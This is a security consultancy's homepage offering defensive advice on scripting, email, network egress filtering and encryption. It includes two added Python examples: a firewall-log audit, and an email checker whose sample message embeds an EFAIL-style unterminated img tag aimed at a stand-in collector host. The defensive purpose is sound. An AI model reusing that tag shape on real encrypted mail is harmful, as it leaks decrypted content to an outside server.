Welcome to AllIncontext
Our motto (top right) encapsulates the principle that whatever you might be doing today (either offline or online), you will need to create or consume data and the information that derives from it. In doing so, you can benefit in time and cost, but remember that your data exists in a security context which might be a deficit in time and cost unless you are careful.
Note: the motto is based on two of Benjamin Franklin's quotations.
To minimize attack vectors, and keep yourself relatively safe:
- On a PC: Use a Web Browser which allows you to control scripting and either disable scripting for the Internet or allow scripts for a limited time. This implies either the use of Internet Explorer 11 (you can disable Scripting and ActiveX controls for the Internet Zone), or Mozilla Firefox with NoScript. The latter might be preferable to any modern HTML5 Web Browser controlled by a large Tech company: Google Chrome and Microsoft Edge.
- On a PC: Never directly read an Email Message, because it might be rendered as HTML. Read it indirectly, if possible, as Plain Text. Extended MAPI allows Outlook Messages to be read this way.
- On a Network: Ensure your core Network connects to the Internet in a stealthy way. That is, you don't have Ports open to Probes. Check with something like Gibson Research Corporation Shields UP! (HTTPS Direct. There are others). If you need Servers with Internet connection, put them on a separate Network with its own Internet connection. If you can't afford that, then put them on a separate Network segment. A reasonable overview is this SANS Institute link (HTTPS Direct, PDF); it is dated 08 Jan 2005 but contains good advice. If you want to think about Network segmentation relating to Business Roles, then people with Roles which need to communicate must be in the same Network segment; otherwise they will have to cross a Security boundary in a well designed and segmented Network.
- On a Network: Test for Egress Filtering of Ports in the range 1 to 65535. By default, all these Ports should be blocked from gaining access to the Internet. Only Ports:
- 21 (File Transfer Protocol, FTP, if you really need it).
- 25 (Simple Mail Transport Protocol, SMTP). Since this Port is used for Relaying, many Internet Service providers (ISPs) block this Port, so use Port 2525.
- 43 (Whois Protocol).
- 53 (Domain Name System, DNS).
- 80 (HTTP).
- 110 (Post Office Protocol, POP3).
- 123 (Network Time Protocol, NTP).
- 143 (Internet Message Access Protocol, IMAP).
- 220 (IMAP, version 3).
- 443 (HTTPS).
- 465 (SMTP over TLS. Deprecated, so this Port is usually Closed).
- 587 (Outgoing SMTP Server over TLS).
- 993 (IMAP over TLS).
- 995 (POP3 over TLS).
- 2525 (SMTP, alternative to Port 25).
- 4321 (Referral Whois Protocol, RWhois).
should be open to gain access to the Internet (and if you're not using POP3, or IMAP, don't open those Ports). Any other Port must be supported by a valid Business case. For example, although unofficial, access to Web site Control Panels (like Plesk) is done on Port 8443 over TLS to be secure. Such an open Port probably needs to be restricted to one, or a few, local IP Addresses. One way to do this is to define a specific Service related to the Port and IP Address(es) and then Apply that as a Firewall Rule. Port testing can be done using the AllPorts.Exposed (HTTPS Direct) Web site and some PowerShell code.
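The egress allowlist above, encoded as a policy check and run over Windows Firewall log lines to find outbound flows that were allowed but should not have been, as an added Python example (not the site's own PowerShell code). The pfirewall.log column layout, the two hosts permitted to use Port 8443 and the sample log lines are assumptions; the addresses are documentation ranges.

```python
from ipaddress import ip_address

# Default egress allowlist from the page: destination ports allowed out to the Internet.
ALLOWED_PORTS = {21, 25, 43, 53, 80, 110, 123, 143, 220, 443, 465, 587,
                 993, 995, 2525, 4321}
# Business-case exception (the page's Plesk example): port -> local hosts allowed to use it.
EXCEPTIONS = {8443: {"192.168.1.10", "192.168.1.11"}}   # constructed placeholder hosts

def egress_verdict(src_ip, dst_port, allowed=ALLOWED_PORTS, exceptions=EXCEPTIONS):
    """'allow' when the outbound flow fits the policy, otherwise 'block'."""
    if dst_port in allowed:
        return "allow"
    if str(ip_address(src_ip)) in exceptions.get(dst_port, ()):
        return "allow"
    return "block"

def parse_pfirewall(line):
    """One Windows Firewall log line (assumed W3C pfirewall.log layout) ->
    (action, protocol, src_ip, dst_ip, dst_port, path), or None to skip."""
    fields = line.split()
    if line.startswith("#") or len(fields) < 17:
        return None
    try:
        dst_port = int(fields[7])
    except ValueError:        # ICMP rows carry '-' in the port columns
        return None
    return fields[2], fields[3], fields[4], fields[5], dst_port, fields[16]

def audit_egress(lines):
    """(src_ip, dst_ip, dst_port) for SEND flows the firewall ALLOWed that policy blocks."""
    violations = []
    for rec in map(parse_pfirewall, lines):
        if rec is None:
            continue
        action, _proto, src, dst, port, path = rec
        if action == "ALLOW" and path == "SEND" and egress_verdict(src, port) == "block":
            violations.append((src, dst, port))
    return violations

# Constructed sample log in pfirewall.log layout (documentation address ranges).
SAMPLE_LOG = """\
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2018-07-16 10:00:01 ALLOW TCP 192.168.1.20 203.0.113.5 51234 443 0 - 0 0 0 - - - SEND
2018-07-16 10:00:02 ALLOW TCP 192.168.1.20 203.0.113.5 51235 3389 0 - 0 0 0 - - - SEND
2018-07-16 10:00:03 ALLOW TCP 192.168.1.10 203.0.113.7 51236 8443 0 - 0 0 0 - - - SEND
2018-07-16 10:00:04 ALLOW TCP 192.168.1.50 203.0.113.7 51237 8443 0 - 0 0 0 - - - SEND
2018-07-16 10:00:05 DROP TCP 192.168.1.50 203.0.113.9 51238 6667 0 - 0 0 0 - - - SEND
2018-07-16 10:00:06 ALLOW ICMP 192.168.1.20 203.0.113.5 - - 0 - - - - 8 0 - SEND
""".splitlines()
```

Flows the firewall already dropped are not reported; the audit is for rules that are too permissive, which is what the allowlist is meant to catch.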
Why do this? Because you cannot guarantee that every Script and Network access is safe, so you need to deny Scripting to HTML content and deny Network Access using Firewall Rules and Access Controls. This will limit Data collection (such as Web site Analytics). The items above are the main ways of attacking your PC and Network. What about Software Restriction Policies (SRP) and AppLocker? These might be bypassed if the Hack is Fileless, so you want to try to avoid the Hack code in the first place.
Remember, Data is a Toxic Asset (HTTPS Direct. This phrase was first coined by the Cryptographer Bruce Schneier. Have a look at his Schneier on Security blog) when it exists as Plain Text. When Data is in Flight, or at Rest, its Toxicity can be reduced by Encryption. The advent of the EU General Data Protection Regulation (GDPR) means that you must have Policies and Standard Operating Procedures (SOPs) to address both Data Classification and Categorization. If you ignore these two requirements, you might be liable for large Fines in the event that you, either as an Individual, or a Company, suffer a Data Breach. The corollary (HTTPS Direct) of Encrypted Data is that you must pay attention to Managing that Data. AllIncontext can help you with this.
To mitigate the Risk to your Data, you can deploy defences like an Intrusion Detection System (IDS [HTTPS Direct]), or a Security Information and Event Management System (SIEM [HTTPS Direct]). However, these systems alert you about any potential risk after the event. You might also find it difficult to get people with the right Skill-set to build and Operate an effective IDS or SIEM. The Cybersecurity blogger Florian Roth has an excellent blog (HTTPS Direct) about what drives people with this Skill-set (you might want to Search that blog for the word ISACA to see the graphic on the 2016 Cybersecurity Skills Gap).
So, you really need a strategy that includes the eyes of the many rather than those of the few in order to try to catch these Data events sooner, preferably while the attempt is being made. This means that you need Tools to be used by the many, which are effective and are not burdensome. AllIncontext can help you with this.
The Internet gives you a great access mechanism to Data and Information, but if you do not know about, or control, your own Data and Information, somebody else might. We therefore provide programs, some of which can be used freely, and expertise which can be used on Windows PC's by both individuals and organizations (both small and large) to achieve that better use.
A potential solution to the Toxic Data problem is the use of a Homomorphic Encryption Scheme. This basically Encrypts Data using a Public Key, and you use a Query, Encrypted with the same Public Key, that is Run against the Encrypted Data. You get out an Encrypted Result Set which can be Decrypted with your Private Key. At no point is Plain Text revealed, so your Encrypted Data can be stored wherever you want.
The catch is that Craig Gentry (of IBM) only proposed the first fully-Homomorphic (HTTPS Direct) Encryption scheme in 2009. As of 2018, it is still not computationally practical for general purpose use. To put the computational deficit into context, see The Register blog (HTTPS Direct) dated 08 Mar 2018 by Richard Chirgwin, which points out that IBM's first practical tests on Cipher Text ran 100 Trillion times slower than operating on Plain Text. IBM has since sped up the Cipher Text operations by 2 Million times, but only by using a 16-Core Server. The C++ HELib library (which underpins the Encryption) has been re-coded to speed operations up by a maximum of 75 times. However, that means that the deficit is still in the Trillion times range. So, Encrypting Data has a Cost (and Risk) versus the Benefit, and any Company, or Individual, will have to decide what Data is Encrypted, using current Symmetric, and Public Key, Encryption, and where to Encrypt that Data.
However, the show must go on and a Company needs to keep Day-to-Day Operations running. So, in the meantime, to give you a flavour of what we can do for you, consider the following:
- Did you know that at least 650 organizations world-wide can put X509 digital certificates onto your PC silently? These are used for accessing secure web sites but can also be used to spy on you. Notable breaches have already happened. Your certificate stores should be regularly scanned.
- When you receive an Email message do you know who actually sent it? Many organizations use third parties that provide bulk mailing and marketing services. If you open such a message, even from someone you trust, you might be providing that organization with personal data if the message is constructed using HTML instead of plain text. You should know the risk for each message, and it is not just about detecting spam.
**** Update: 16 Jul 2018. The 14 May 2018 EFAIL (HTTPS Direct) Attack vector is the direct consequence of the Collision of Two Standards: Simple Mail Transport Protocol (SMTP [HTTPS Direct]) and the Hypertext Markup Language (HTML [HTTPS Direct]). The HTML Body of the Email Message had an Img Tag that spanned the Encrypted Data. The consequence was that the Email Client Decrypted the Cipher Text and then HTML resolved the Img Tag, which meant that the Decrypted Data was sent to the Web Server Hosting that Image. Email messages are only relatively Secure if they consist of a Plain Text Body (which can still Leak Data) and Encrypted Attachments, which are not susceptible to the processing which happens to the Email Body. Note that neither of the Data Encryption Standards (de facto, or otherwise) of Pretty Good Privacy (PGP [HTTPS Direct]) and Secure/Multipurpose Internet Mail Extensions (S/MIME [HTTPS Direct]) were compromised with respect to their Cryptographic Primitive functions (that is, How Data is Encrypted and Decrypted).
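The two message risks above (the bulk mailer's HTML tracking image, and the EFAIL shape of an HTML tag left open across an encrypted part) as a defender's check over a raw message, an added Python example that is not AllIncontext's code. The sample message is constructed, its PGP block is a placeholder rather than real ciphertext, and the finding names are my own; the mitigation is the page's: render mail as plain text.

```python
import re
from email import message_from_string
from email.policy import default

# Remote image reference in an HTML body (a bulk mailer's tracking pixel).
REMOTE_IMG = re.compile(r'<img\b[^>]*\bsrc\s*=\s*["\']?\s*(?:https?:)?//', re.I)

def is_encrypted_part(part):
    """PGP/MIME, S/MIME or an inline ASCII-armoured block counts as encrypted."""
    ctype = part.get_content_type()
    if ctype in ("application/pgp-encrypted", "application/pkcs7-mime"):
        return True
    return ctype.startswith("text/") and "-----BEGIN PGP MESSAGE-----" in part.get_content()

def assess_message(raw):
    """Sorted findings for one message; [] means nothing to flag."""
    findings, open_tag_pending = set(), False
    for part in message_from_string(raw, policy=default).walk():
        if part.is_multipart():
            continue
        if part.get_content_type() == "text/html":
            html = part.get_content()
            if REMOTE_IMG.search(html):
                findings.add("remote-image")
            # A last '<' with no closing '>' means a tag runs past this part.
            open_tag_pending = html.rfind("<") > html.rfind(">")
            continue
        # Encrypted part right after an HTML part that left a tag open: the EFAIL shape.
        if open_tag_pending and is_encrypted_part(part):
            findings.add("open-tag-spans-ciphertext")
        open_tag_pending = False
    return sorted(findings)

# Constructed sample: tracking pixel, unterminated img tag, then a placeholder PGP block.
RISKY_MSG = """\
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html

<p>Hello</p><img src="https://track.example/open.gif" width="1" height="1">
<img src="https://collector.example/
--b1
Content-Type: text/plain

-----BEGIN PGP MESSAGE-----
PLACEHOLDER-NOT-REAL-CIPHERTEXT
-----END PGP MESSAGE-----
--b1--
"""
```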
- Do you regularly back-up your data? If you do, how easy is it to recover a specific instance of that data when you need it (and do you keep just one copy or several in order to track changes in that data)? Is your data encrypted (either using symmetric or asymmetric keys)? If your data is in the Cloud you should encrypt it.
- Do you know what events are taking place on your Windows PC? The operating system, and programs, place messages into the event log. If you are unaware of these events, your Windows PC might not work optimally.
- Do you know whether the components making up your PC are working correctly or not? If not, your PC might develop a problem about which you are not aware. A Windows PC uses Windows Management Instrumentation (also called WMI) for this purpose. WMI events should be monitored on a regular basis.
- Do you know who is scanning your ADSL router? If not then you should consider using a syslog daemon to monitor which IP addresses are attempting to do this.
- Do you use an Uninterruptible Power Supply (UPS) to protect one or more servers? If so, do you monitor it or is it capable of putting an event in the log?
If you answer No to any of the above, we can help you.
We have more than 40 years' experience of: Theory and Computer Modelling of the Quantum Mechanical effects of Excitons (HTTPS Direct) in Impure Organic Molecular Crystals (British Library EThOS link [HTTP Direct, not Secure]); Working with technology in research, in a government run computer laboratory (Rutherford Appleton Laboratory [HTTPS Direct]) and in the private sector. That experience covers: Computer animated film making and 3D modeling; ISO graphics standards; Implementing and managing a large company Help Desk; PC security; Printing strategy; Re-developing (twice) a company's world-wide data feeds for Distribution Requirements Planning (DRP) to take advantage of new technology; Implementing both Novell (remember them) and Windows Local Area Networks (LANs) on a large company site; Implementing long-line ISDN (the forerunner to ADSL) across the UK for a business unit of a world-wide company; De-commissioning the IT and Infrastructure for a world-wide company's headquarters site.
Benjamin Franklin Quotations
The basis of the motto is two quotations from Benjamin Franklin (HTTPS Direct) and his Poor Richard's Almanac:
- An investment in knowledge always pays the best interest.
- You may delay, but time will not.
More of his quotations can be found here (Google Secure Webcache).
This Web site
Use the category links at the top of the page to move around the site, and the You are here breadcrumb to move within a category.
This web site is deliberately kept simple and only uses XHTML (no client side scripting) to keep you safe.
To send us a message, use the contact link above.
Our information security policy is simple. We retain personal information required under UK law (for example names and addresses on invoices) and that which you communicate directly to us. This is not shared with third parties. Information used for software trials contains no personal data.
Click here to see how this web site treats web page links external to AllIncontext (the exceptions are the W3C image links below, which you can click on to verify that the current page conforms to the XHTML 1.0 standard (but why use it?) and that the Cascading Style Sheet used for the page conforms to the CSS 2.1 standard. If you find a page that no longer validates, please let us know using the contact link at the top of this page). See this link for more on this Web site Design Philosophy (and other things, such as Writing Style).